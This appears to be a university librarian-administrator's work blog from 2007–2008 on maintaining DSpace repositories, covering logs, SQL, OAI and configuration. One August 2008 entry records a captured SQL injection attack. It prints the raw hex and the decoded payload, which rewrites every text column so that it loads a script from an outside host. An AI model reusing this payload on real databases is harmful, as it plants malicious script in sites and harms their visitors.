69.109.228.170 - - [21/Sep/2008:23:59:27 -0500] "GET /bitstream/31045/1/26020387.pdf HTTP/1.1" 200 1225483 "http://scholar.google.com/scholar?hl=en&lr=&q=accept+Genetically+modified+organism&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"

When the guts of this request is sent to agecon by entering the line below into a browser:

http://ageconsearch.umn.edu/bitstream/31045/1/26020387.pdf

Catalina records the following log entry:

2008-09-30 16:12:08,153 INFO org.dspace.app.webui.servlet.BitstreamServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_bitstream:bitstream_id=3976


Required conversions

Notice that in the two log entries above, apache records a handle of 31045, while the dspace log gives a bitstream_id of 3976. To convert from apache to dspace, we must map the handle to the bitstream_id. The sql command below will do this:

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id); bitstream_id
bundle_id
-----------
3976
Note the bundle_id and the bitstream_id are the same.

Views

Comparison of apache and dspace logs

For views we have an apache log of the form:

203.20.101.203 - - [21/Sep/2008:23:32:17 -0500] "GET /handle/22682 HTTP/1.1" 503 410 "http://scholar.google.com.au/scholar?q=%22some+implications+of+the+growth+of+the+mineral+sector%22&hl=en&um=1&ie=UTF-8&oi=scholart" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"

When the request below is put into a browser:
http://ageconsearch.umn.edu/handle/22682

We get the catalina log:

2008-09-30 16:26:30,456 INFO org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_item:handle=22682

Required conversions

To generate the dspace log format, we need to determine what was being viewed. In the case above it was an view_item.
From the handle we can find the resource_type_id, which allows us to generate terms like, view_item.
select * from handle where handle=22682; handle_id | handle | resource_type_id | resource_id -----------+--------+------------------+------------- 13089 | 22682 | 2 | 12346
The table below provides a conversion between the resource_type_id and they actual type.
resource_type resource_type_id
BITSTREAM 0
BUNDLE 1
ITEM 2
COLLECTION 3
COMMUNITY 4
SITE 5
GROUP 6
EPERSON 7

September 24, 2008

Analysis of Apache/Catalina AgEcon Records for

Breakdown of log entries by type

I looked at the catalina.out log records for 2008-09-21. These logs are in the file: catalina.out_2008-09-21 (because of the way that the files are backed up the log entries only extend to 11:30 PM). From these entries, I made a list of log entries by type: BreakDownOfAgEconLog_2008_09_21.html It is worth noting that of the 62K hits only 20 came from "SimpleSearch". That is only 20 users went to our search engine and the rest searched through google or are robots.

Log types that are required for stats

Jason Roy and I agree that the following log types are need for stats.
Log Name Number in Log Found Apache Match Apache needs SQL
view_bitstream 10772 Y Y
view_item 4462 Y N
view_collection 2084 Y Y
view_community 582 Y Y
The "Apache needs SQL" column indicates whether it is required to use information from the dspace SQL database to map the apache logs to dspace catalina logs. Also the term "view_bitstream" corresponds to download.

How apache logs map to catalina logs

To take care of some issues in the catalina logs, I am going to use apache logs. Here are examples of the log entries for both apache and catalina for all of the critical log types given in the table above. There are also catalina examples for almost all the types.

September 17, 2008

Why UDC crashed ... "pool exhausted" error Jason, Basically DSPACE does not properly close connections to the SQL server. When the pool is exhausted it generates error messages. This may be more of a problem now because OAI is available (climbing down t

Jason,

Basically DSPACE does not properly close connections to the SQL server. When the pool is exhausted it generates error messages. This may be more of a problem now because OAI is available (climbing down the tree will hit the DB a lot) or there is another SQL-Injection attack, or UDC just may be more popular. I did not explore the probable increased load.

A more detailed explanation of the error is given below, with a possible fix. To step up the fix given on the web I need some privileges on strip3. I have asked CCO for them.

Jeff

1) Problem Indicated in the Logs

Starting at
2008-09-17 08:23:08,769
and ending at
2008-09-17 08:53:29,729 (When Bill restarted DSPACE).
There were 330 error messages of the type:
2008-09-17 08:53:29,729 WARN org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:no_context:database_error:org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool exhausted


An error messages of this sort would generate an error screen.

2) Fix from University of Michigan

In dspace-tech the University of Michigan team addresses this problem by closing prossess that have the phrase 'idle in transaction' when displayed by ps.

see
http://www.mail-archive.com/dspace-tech@lists.sourceforge.net/msg01057.html

3) Confirmation that our problem matches University of Michigan's
I have checked strip3 (where the postgres database lives) and between 08:54 (When Bill restarted DSPACE) and 11:22, there have been 45 processes created that have the form:

postgres 15047 0.0 0.0 86304 4964 ? S 10:58 0:00 postgres: dspace_ir dspace_ir 134.84.135.19 idle

So we are building up these "idle" processes on the DB side and it is likely that the system will crash again, unless we put in the Michigan fix

September 16, 2008

Properties of tomcat and apache on strip1

Here are the properties:

Using CATALINA_BASE: /opt/tomcat
Using CATALINA_HOME: /opt/tomcat
Using CATALINA_TMPDIR: /opt/tomcat/temp
Using JRE_HOME: /opt/jdk1.5.0_10
Server version: Apache Tomcat/5.5.20
Server built: Sep 12 2006 10:09:20
Server number: 5.5.20.0
OS Name: Linux
OS Version: 2.6.9-78.0.1.ELsmp
Architecture: i386
JVM Version: 1.5.0_10-b03
JVM Vendor: Sun Microsystems Inc.



Server version: Apache/2.0.52
Server built: May 9 2008 05:54:40

mod_jk/1.2.25

September 11, 2008

Bad handle in AgEcon indexer

An AgEcon patron tried to submit a file to the archive. When they did a search based on author an error resulted. The AgEcon staff resubmitted and then deleted the old record. It looks like a bad handle got into the lucene index with the submit and then was never removed. When dspace queries lucene and finds a handle that is not in the DB it throws an error and halts the search. Perhaps it should continue on. Here is some error logs.

September 8, 2008

OAI on odin

Activating the OAI harvester

I have enabled the OAI harvester for the dspace instance on the odin box. I needed to make the oai_dc metadata available. To do this I copied the file:

~/dspace_home/config/templates/oaicat.properties
to
~/dspace_home/config/templates/oaicat.properties

and returned the contents of this file to its original form (i.e. revision 1). Note: in this default state the file oaicat.properties has the line:
Crosswalks.oai_dc=org.dspace.app.oai.OAIDCCrosswalk uncommented.
I also removed the replace task from the build.xml file in the dspace-sr instance. Although for several months the OAI harvestor has been operational, the changes mean that the dspace-ir (UDC) and the dspace-sr (AgEcon) invoke the OAI system in an identical fashion.

Hyperlinks to call OAI verbs

Hyperlinks to development server on odin

The URL below returned all the metadata:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc

This URL will return all the metadata since 2008-04-15:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15

The next URL returns the data between 2008-04-15 and 2008-04-20
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-20

Hyperlinks to live box

AgEcon:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
UDC:
http://strip1.oit.umn.edu:8080/dspace_ir-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Nice hyperlinks to live box

http://strip1.oit.umn.edu:8080/dspace_ir-oai/
has been aliased to
http://conservancy.umn.edu/oai

and
http://strip1.oit.umn.edu:8080/dspace_ir-oai/
has been aliased to
http://ageconsearch.umn.edu/oai/

These are much nicer to look at.

So the urls below will work.
http://conservancy.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
http://ageconsearch.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Issues with OAI harvester on DSPACE

Elements in the AgEcon schema are not displayed

Only the AgEcon metadata that are Dublin Core are displayed by the OAI harvester
Note in the table from the link above:  
metadata_schema_id = 1 is dc schema
metadata_schema_id = 2 is agecon schema

The elements of the AgEcon schema are not displayed by the current crosswalk and a new crosswalk would have to be written.

Crosswalk is not qualified Dublin Core

The crosswalk from the dspace archive to the OAI output is Dublin Core not qualified Dublin Core (note the metadataPrefix=oai_dc in the OAI requests above).
So the values:
 date        | accessioned | Date DSpace takes possession of item.
 date        | available        | Date or date range item became available to the public.
 date        | issued    
  
are all mapped to the tag <dc:date> In this OAI output sample , I have pointed out which OAI <dc:date> tags correspond to the various qualified Dublin Core dates. I did an sql query on item 2 to find the actual values for the different date fields.
I could try to find a caned crosswalk for DSPACE to qualified DC. I have briefly looked for this several people say it would be a good thing but I have not found anyone who has done this. Hard to say how long this would take, but it is possible that no one has done it.

Update oaicat.jar

I did an update on oaicat.jar. It turns out that this both versions of the jar work, so I stayed with the more recent version. The manifests form both jars are given here.
oaiCatMainfest.html

August 26, 2008

SQL injection attacks on dspace

We have been getting a large number of SQL inject attacks. Below is the raw hex of these attacks and the ascii translations.
Raw hex: www.lib.umn.edu/libdata/page_print.phtml?page_id=1337'; DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x 4445434C415245204054207661726368617228323535292C4043207661 7263686172283430303029204445434C415245205461626C655F437572 736F7220435552534F5220464F522073656C65637420612E6E616D652C 622E6E616D652066726F6D207379736F626A6563747320612C73797363 6F6C756D6E73206220776865726520612E69643D622E696420616E6420 612E78747970653D27752720616E642028622E78747970653D3939206F 7220622E78747970653D3335206F7220622E78747970653D323331206F 7220622E78747970653D31363729204F50454E205461626C655F437572 736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C452840404645544348 5F5354415455533D302920424547494E20657865632827757064617465 205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B 275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268 7474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A 73223E3C2F7363726970743E3C212D2D272720776865726520272B4043 2B27206E6F! ASCII DECLARE @T varchar(255),@C va?rchar(4000) DECLARE Table_Cur?sor CURSOR FOR select a.name,?b.name from sysobjects a, sysc?olumns b where a.id=b.id and ?a.xtype='u' and (b.xtype=99 o?r b.xtype=35 or b.xtype=231 o?r b.xtype=167) OPEN Table_Cur?sor FETCH NEXT FROM Table_Cu?rsor INTO @T,@C WHILE(@@FETCH?_STATUS=0) BEGIN exec('update? ['+@T+'] set ['+@C+']=['+@C+?']+''"></title><script src= "h?ttp://sdo.1000mg.cn/csrss/w.j?s"></script><!--'' where '+@C?+' no

August 25, 2008

Small changes to UDC

I. Change a simple phrase

OLD: ./config/language-packs/Messages.properties:112:jsp.collection-home.submit.button =
OLD: Submit to This Collection
NEW:Submit another item

II. kill "Subscribe to this collection to receive daily e-mail notification of new additions" button

The file ./jsp/local/collection-home.jsp was edited to remove the button.
edits to collection-home.jsp

August 21, 2008

Exporting DSPACE repository to flat files

Exporting DSPACE repository to flat files
Export collection with handle: 33784
Export to the directory: /dspace/assetstore/ag_export/im/
Export to start at lowest member of collection : n=0

./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 33784
-d /dspace/assetstore/ag_export/im/ -n 0

Subdirectories created
[silvi003@strip1 im]$ ls 0 13 18 22 27 31 36 40 45 5 54 59 63 68 72 77 81 86 90
1 14 19 23 28 32 37 41 46 50 55 6 64 69 73 78 82 87 91
10 15 2 24 29 33 38 42 47 51 56 60 65 7 74 79 83 88 92
11 16 20 25 3 34 39 43 48 52 57 61 66 70 75 8 84 89 93
12 17 21 26 30 35 4 44 49 53 58 62 67 71 76 80 85 9

Contents of the first subdirectory
[silvi003@strip1 im]$ ls 0
contents dublin_core.xml fo07he01.pdf handle
The Dublin Core in the first subdirectory

[silvi003@strip1 im]$ cat 0/dublin_core.xml
0/dublin_core.xml

July 28, 2008

Sending dspace email to a gmail accounts

email situation

Dspace sends me a large number of email messages. My real email gets lost in a forest of dspace messages. So I have need to find every instance where silvi003@umn.edu is used and replace it with an account that I set up: dspacedump@gmail.com
So I changed:

mail.admin = silvi003@umn.edu
alert.recipient = silvi003@umn.edu

to

mail.admin = dspacedump@gmail.com
alert.recipient = dspacedump@gmail.com

in
./config/dspace.cfg

July 17, 2008

media filter UDC and cron job

Cron job

My predecessor wrote a cron job to index the contents of the pdfs in UDC. It is:
#
# Filter media
#
1 0 * * * /dspace/dspace-ir/bin/filter-media.sh > /dspace/dspace-ir/log/filter-media.log 2>&1
It was noted that this process was taking up to eight hours to run and impacting the users.
It will need to be edited and replaced.

Error record associated with the cron job

Creating search index:
Applying Media Filters
2008-02-11 08:07:19,271 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4938 to a DSpace object
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:192)
Applying Media Filters
2008-02-11 08:07:19,839 INFO  org.dspace.core.ConfigurationManager 
       @ DSpace logging installed using log4j.properties
2008-02-11 08:07:20,160 INFO  org.dspace.content.MetadataField 
       @ Loading MetadataField elements into cache.
2008-02-11 08:07:20,199 INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
SKIPPED: bitstream 16263 because 'LIFE_SCIENCEs_PREDESIGN_REPORT041504_.pdf.txt' already exists
SKIPPED: bitstream 16261 because 'equine_predesign_may04.pdf.txt' already exists
SKIPPED: bitstream 16259 because 'EducationalFacilitiesPredesignStudyFinal.pdf.txt' already exists
ERROR filtering, skipping bitstream #16251 java.lang.ArrayIndexOutOfBoundsException: 4
java.lang.ArrayIndexOutOfBoundsException: 4
        at org.fontbox.cmap.CMapParser.parseNextToken(CMapParser.java:294)
        at org.fontbox.cmap.CMapParser.parse(CMapParser.java:103)
        at org.pdfbox.pdmodel.font.PDFont.parseCmap(PDFont.java:535)
        at org.pdfbox.pdmodel.font.PDFont.encode(PDFont.java:387)
        at org.pdfbox.util.PDFStreamEngine.showString(PDFStreamEngine.java:325)
        at org.pdfbox.util.operator.ShowTextGlyph.process(ShowTextGlyph.java:80)
        at org.pdfbox.util.PDFStreamEngine.processOperator(PDFStreamEngine.java:452)
        at org.pdfbox.util.PDFStreamEngine.processSubStream(PDFStreamEngine.java:215)
        at org.pdfbox.util.PDFStreamEngine.processStream(PDFStreamEngine.java:174)
        at org.pdfbox.util.PDFTextStripper.processPage(PDFTextStripper.java:336)
        at org.pdfbox.util.PDFTextStripper.processPages(PDFTextStripper.java:259)
        at org.pdfbox.util.PDFTextStripper.writeText(PDFTextStripper.java:216)
        at org.pdfbox.util.PDFTextStripper.getText(PDFTextStripper.java:149)
        at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:110)
        at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:155)
        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:327)
        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:296)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:266)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersCollection(MediaFilterManager.java:260)
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:202)
ERROR filtering, skipping bitstream #16250 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 16249 because 'Volume_II-Appendix2.pdf.txt' already exists
ERROR filtering, skipping bitstream #16248 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 15486 because 'AHC_FacilitiesMasterPlan.pdf.txt' already exists
SKIPPED: bitstream 13492 because 'Vet_med_facilities_development_plan_FINAL.pdf.txt' already exists
SKIPPED: bitstream 13490 because 'SPH_CONSOLIDATION.pdf.txt' already exists
SKIPPED: bitstream 13488 because 'AHC_strategic_facility_plan_1998.pdf.txt' already exists
SKIPPED: bitstream 13486 because 'AHC_Precinct_Plan_Report_Final_May_2006.pdf.txt' already exists
SKIPPED: bitstream 13484 because 'AHC_Mpls_District_Plan_2000.pdf.txt' already exists
Creating search index:
Creating browse index
Indexing all Items in DSpace....2008-02-11 08:17:24,358 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
2008-02-11 08:17:25,315 
   INFO  org.dspace.content.MetadataField @ Loading MetadataField elements into cache.
2008-02-11 08:17:25,357 
   INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
 ... Done
Creating search index
2008-02-11 08:19:57,683 INFO  org.dspace.core.ConfigurationManager @ 
   DSpace logging installed using log4j.properties

Some basic information on Dspace

Possible ant tasks

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

Some important boxes

UDC sandbox
http://odin.lib.umn.edu:9040/dspace-ir/

We set up a virtual machine for strip one and two.
strip1vm.oit.umn.edu 160.94.138.139
strip3vm.oit.umn.edu 160.94.138.140

Miscellaneous

Version that we use: DSpace Version 1.4.1, 8-December-2006
Approximate size of the asset store: 73G
Server version: Apache/2.0.52
On strip1, the Library specific apache configs are kept in /opt/httpd/conf.d

June 20, 2008

Host Based Access on Postgres and DSPACE ... pg_hba.conf

The pg_hba.conf file controls remote access to postgres.
On strip 3 of our DSPACE instance there are two of these files:

/opt/pgsql/data/pg_hba.conf
/var/lib/pgsql/data/pg_hba.conf


/var/lib/pgsql/data/pg_hba.conf is the live one.

June 18, 2008

SQL select to get author handle data_issued and title from the postgres DB

select itemsbytitle.title , handle.handle, itemsbydate.date_issued , itemsbyauthor.author
from (( itemsbytitle
INNER JOIN handle ON itemsbytitle.item_id = handle. resource_id)
INNER JOIN itemsbydate ON itemsbydate.item_id = itemsbytitle.item_id)
INNER JOIN itemsbyauthor ON itemsbyauthor.item_id = itemsbytitle.item_id
where resource_id = 8137;

June 12, 2008

Information on Journal in AgEcon from Brad Teale

Hi Jeff, The Journal listing is created in the Community.java class under org/dspace/content. It is using the following SQL statement: SELECT DISTINCT(community.community_id), name, short_description, introductory_text, logo_bitstream_id, copyright_text, side_bar_text FROM community, community2item WHERE community2item.item_id IN (SELECT item_id FROM metadatavalue WHERE metadata_field_id=(SELECT metadata_field_id FROM metadatafieldregistry WHERE element='type' AND qualifier IS NULL) AND text_value IN ('Journal Article', 'Submitted Journal Article')) AND community.community_id=community2item.community_id ORDER BY (name) ASC; Basically, it is looking in the metadatafieldregistry table for element=type and an empty qualifier with a text_value of either: Journal Article or Submitted Journal Article. These were the terms defined during the initial requirements gathering of these pages. If something else is defined as a Journal type it does require a code change. It would be nice to move these text_value values into the configuration so changes don't require code modifications. Let me know if you have additional questions. Brad

May 28, 2008

AgEcon MetaData

Below is a list of all the metadata used by AgEcon. Note
metadata_schema_id = 1 refers to dc,
metadata_schema_id = 2 refers to agecon.
AgEconMetadata.html

May 23, 2008

AgEcon OAI URL

Naming OAI handler

I have enabled OAI on AgEcon Search. It can be reached at the URL:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=Identify


John Chapman gave me a list of common OAI sites:

http://gita.grainger.uiuc.edu/registry/ListAllRepos.asp


Of the URLs there I like the one below the best:

XML/XSD/XSL Registry (xmlregistry.oclc.org)
http://alcme.oclc.org/xmlregistry/OAIHandler?verb=Identify

It does not have an explicit IP or refer to specific technology, so it would b e easy to maintain as AgEcon migrates from box to box and from one technology to the next.

So based on that I plan on using:
http://ageconsearch.umn.edu/OAIHandler?verb=Identify

Changes in config files

The changes below were required to for oai to come to life:

File: ./config/dspace.cfg
config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties ... old
config.template.oaicat.properties = ${dspace.dir}/config/templates/oaicat.properties ... new

File: ./build.xml
./build.xml:281: <replace file="${dspace.dir}/config/templates/oaicat.properties"
./build.xml:285: <replace file="${dspace.dir}/config/templates/oaicat.properties"

File: ./etc/oai-web.xml
./etc/oai-web.xml:66: @@dspace.dir@@/config/templates/oaicat.properties

Test OAI handler

http://odin.lib.umn.edu:9030/dspace-oai/request

OAI jar information

[silvi003~/Documents/workspace/dspace-sr/lib]$ dumpManifest oaicat.jar Manifest-Version: 1.0 Ant-Version: Apache Ant 1.6.1 Created-By: 1.4.1_01-b01 (Sun Microsystems Inc.) Specification-Title: OAI-PMH Specification-Version: 2.0 Specification-Vendor: Open Archives Initiative Implementation-Title: OAICat Implementation-Version: 1.5.48 October 23 2006 Implementation-Vendor: OCLC, Online Computer Library Center Implementation-URL: http://www.oclc.org/research/software/oai/cat.shtm To get the jar go to: OCLC software

Info on OAI tools

OAIToolsFinal.pdf

April 22, 2008

Simple jsp form in dspace and jsp to read it

Jen made the jsp from below:

new-user_direct-email.jsp
I wrote the jsp below to catch the result:

mail_request_for_new_user.jsp
This is a simple chunk of code but I may reuse it.

March 27, 2008

odin ssl certificates

There have been some problems with the viewing of certain images in both UDC and AgEcon from the odin.lib.umn.edu. We believe this was dues to certificates that I made using the java tool. I replaced my certificate with one made by Brad.

March 12, 2008

Comment out UDC email updates

There is a link called "email updates" updates that should allow a user to to subscribe to information about new submits. It is broken and for now has been commented out. Below are the commented out lines: [silvi003~/Documents/workspace/dspace-ir]$ xff -B 2 -A 2 'get.email.updates' ./jsp/local/layout/navbar-default.jsp-232-<!-- ./jsp/local/layout/navbar-default.jsp-233- <td nowrap="nowrap" class="navigationBarItem"> ./jsp/local/layout/navbar-default.jsp:234: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a> ./jsp/local/layout/navbar-default.jsp-235- </td> ./jsp/local/layout/navbar-default.jsp-236- </tr> -- ./jsp/local/layout/navbar-home.jsp-152- <!-- ./jsp/local/layout/navbar-home.jsp-153- <td nowrap="nowrap" class="navigationBarItem"> ./jsp/local/layout/navbar-home.jsp:154: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a> ./jsp/local/layout/navbar-home.jsp-155- </td> ./jsp/local/layout/navbar-home.jsp-156- -->

March 3, 2008

Changing the display mode for AgEcon

Two files had to be changed to make visible in the standard output a few new fields.

Changes to dspace.cfg

The following section of dspace.cfg was modified.

Changes to ItemTag.java

ItemTag.java had to be modified to properly read the new dspace.cfg.

Future changes

If fields need to be changed in the future only dspace.cfg will have to change.

DB commands for Dspace

See if a an item id is in the DB.

February 22, 2008

Process to do an itemexport for a collection in dspace

There is a way to extract items in a collection from dspace so that they have the form of a plane pdf and a flat xml files. This directories can be batch ingested back into dspace or another repository.

Finding a collection's ID

The file below shows how to find a collection's ID in dspace. getCollectionID

Brad Teal's filter_media.sh script

The filter-media.sh script will find all the handles of all the collections.

Execute the command to extract the data

[silvi003 /dspace/dspace-ir/bin]$ ./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 29 -d /dspace/assetstore/udc_export/ima/ -n 0

Resulting Directory Structure

Resulting directories from ItemExport command.

February 15, 2008

Check that abort page for license contains no logic for AgEcon

We have moved the license page form the last [page of the submit to the first. The wording of the page says that the entry will be saved, but of course there is no entry. The wording can be easily changed, but I needed to check that the jsp was not executing any code (i.e. trying to write to a file or the DB). It is not so all is well.

January 25, 2008

Hardwire jsp initial questions

The initial questions checkbox on submit workflow needed to be hardwired. So I made all the buttons hidden and used javascript to automatically submit the form. This is a quick and dirty way to hardwire the values in a jsp form.
Original initial-questions.jsp

Hardwired version

Plan to add email field to name type in dspace submit

Currently the name type that is used to generate forms in dspace has two text fields (first and last name). We need a third field for email and below are the steps that must be taken to create this field.

Steps:

1) Copy edit-metadata.jsp to local -> confirm that new jsp is "live"

2) Confirm edu.umn.dspace.submit.step.DescribeStep is alive

3) Make "email_name" type from "name" type ... do not modify any code in "email_name" yet

4) Drop DCPersonName in "email_name" replace with string

5) Add three text fields to "email_name" in edit-metadata.jsp

6) Fix string in "email_name" code in edu.umn.dspace.submit.step.DescribeStep to handle 3rd field

January 11, 2008

Remove upload messages from AgEcon page

Remove upload messages from AgEcon page

The file choose-file.jsp had to be modified: <%-- <p class="submitFormHelp"><strong>Netscape users please note:</strong> By default, the window brought up by clicking "Browse..." will only display files of type HTML. If the file you are uploading isn't an HTML file, you will need to select the option to display files of other types. <object><dspace:popup page="/help/index.html#netscapeupload">Instructions for Netscape users</dspace:popup></object> are available.</p> --%> <%-- Louise Letnes and Julia Kelly wanted these messages deleted from the top of the upload page <div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info3"/> <dspace:popup page="/help/index.html#netscapeupload"><fmt:message key="jsp.submit.choose-file.info4"/></dspace:popup></div> --%> <%-- FIXME: Collection-specific stuff should go here? --%> <%-- <p class="submitFormHelp">Please also note that the DSpace system is able to preserve the content of certain types of files better than other types. <object><dspace:popup page="/help/formats.jsp">Information about file types</dspace:popup></object> and levels of support for each are available.</p> --%> <%-- <div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info6"/> <dspace:popup page="/help/formats.jsp"><fmt:message key="jsp.submit.choose-file.info7"/></dspace:popup> </div> --%>

January 7, 2008

Changes to AGEcon Submit -- First Set of Changes

I) Fields to add

1) Items to modify

Here are all the meta data for the agecon project The items labeled must be added to the submit form.
These items are:
A) hasEndPage
B) hasStartPage
C) ispartofname
D) ispartofnumber
C) ispartoftitle
D) ispartofvolume

B) Changes to the java code

Needed to modify the code shown below in from the Item.java class : public DCValue[] getDC(String element, String qualifier, String lang) { DCValue[] MetaData = getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang); if (MetaData.length == 0) MetaData = getMetadata("agecon", element, qualifier, lang); // return getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang); return MetaData; } This allows the software to recognize both agecon elements and dc, so the items will appear in in the verify step.

2) Making changers so that new items appear in search

A) In the file /config/dspace.cfg add lines to webui.itemdisplay.default so that it has the form below: webui.itemdisplay.default = dc.title, dc.title.alternative, \ dc.contributor.author, \ agecon.contributor.authorContact, \ dc.contributor.editor, \ agecon.contributor.editorContact, \ dc.subject, dc.date.issued(date), \ dc.relation.ispartofseries, \ dc.description.abstract, \ dc.description, \ agecon.relation.ispartoftitle, \ agecon.relation.ispartofnumber, \ agecon.relation.ispartofvolume, \ agecon.relation.ispartofname, \ agecon.format.hasStartPage, \ agecon.format.hasEndPage, \ dc.format.extent, \ dc.relation B) In the file config/language-packs/Messages.properties add: metadata.agecon.relation.ispartoftitle = Journal Title metadata.agecon.relation.ispartofnumber = Journal Number metadata.agecon.relation.ispartofvolume = Journal Volume metadata.agecon.relation.ispartofname = Journal Issue metadata.agecon.format.hasStartPage = From Page metadata.agecon.format.hasEndPage = To Page

All the new items are now visible in the dspace search.

II) Move License to the front

In the file item-submission.xml create a new Submisssion Processs with the license first. Make this submission process thew default.

III) Combine two description pages

By eliminating the xml below that separated two description pages (in the file input-forms.xml). I was able to combine two of the description pages. </page> <page number="2">

January 2, 2008

Possible ant builds for dspace

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

December 4, 2007

Location of pdfs after dspace submit

After the dspace submit process, the pdfs are sent to the directory:

/usr/local/dspace-sr-dev/assetstore

and are given cryptic names like:

/usr/local/dspace-sr-dev/assetstore/97/93/57/97935760829952567360200962040412392397


97935760829952567360200962040412392397 is a pdf file.

files modified for sort (final ingest into UDC)

Last week I did an svn commit to update UDC so that it would sort.
here are the files that were modified
M config/dspace.cfg
M src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
M src/org/dspace/search/DSQuery.java
M src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java
M jsp/local/browse/items-by-date.jsp
M jsp/local/browse/items-by-subject.jsp
M jsp/local/browse/items-by-title.jsp
M jsp/local/browse/items-by-author.jsp
M jsp/local/search/results.jsp
M jsp/layout/location-bar.jsp

The two files below were modified during an earlier ingest:
src/org/dspace/search/DSIndexer.java
src/org/dspace/search/QueryArgs.java

see note of November 07, 2007

November 30, 2007

create-administrator ... makes an admin user in dspace

This cmd line function steps you though creating a admmin user in dspace

location:
/usr/local/dspace-sr-dev/bin/create-administrator


I had to make changes to the script documented below:
########################################################################### # Shell script creating a starting administrator account # Get the DSPACE/bin directory BINDIR=`dirname $0` #***************************************************************** # Within the dspace.jar for Agecon there was no class called: # edu.umn.dspace.administer.CreateAdministrator # however I found a class called: # org/dspace/administer/CreateAdministrator # I used that jar and this script worked properly # # #$BINDIR/dsrun edu.umn.dspace.administer.CreateAdministrator # # J Silvis # 29 Nov 2007 #***************************************************************** $BINDIR/dsrun org/dspace/administer/CreateAdministrator

November 7, 2007

Files changed to make ag econ sort

The files below were changed to make ag econ sort, by clicking the headers of the tables.
SR/trunk/config/dspace.cfg
SR/trunk/jsp/local/search/results.jsp
SR/trunk/src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
SR/trunk/src/org/dspace/search/DSIndexer.java
SR/trunk/src/org/dspace/search/DSQuery.java
SR/trunk/src/org/dspace/search/QueryArgs.java
SR/trunk/src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java

This is R 57 in the SVN Repository

Continue reading "Files changed to make ag econ sort" »

October 30, 2007

Adding a new field to the dspace database

In the file ./config/dspace.cfg one finds:

search.index.1 = author:dc.contributor.*

search.index.2 = author:dc.creator.*

search.index.3 = title:dc.title.*

search.index.4 = keyword:dc.subject.*

search.index.5 = abstract:dc.description.abstract

search.index.6 = author:dc.description.statementofresponsibility

search.index.7 = series:dc.relation.ispartofseries

search.index.8 = abstract:dc.description.tableofcontents

search.index.9 = mime:dc.format.mimetype

search.index.10 = sponsor:dc.description.sponsorship

search.index.11 = identifier:dc.identifier.*

search.index.12 = language:dc.language.iso

search.index.13 = date:dc.date.issued

I added the line that is bolded.

After this line is added you must run:

ant init_configs -- update the config system

ant install_code -- compile the indexer code

And then the script below to reindex lucence:

/usr/local/dspace-sr-dev/bin/index-all


October 22, 2007

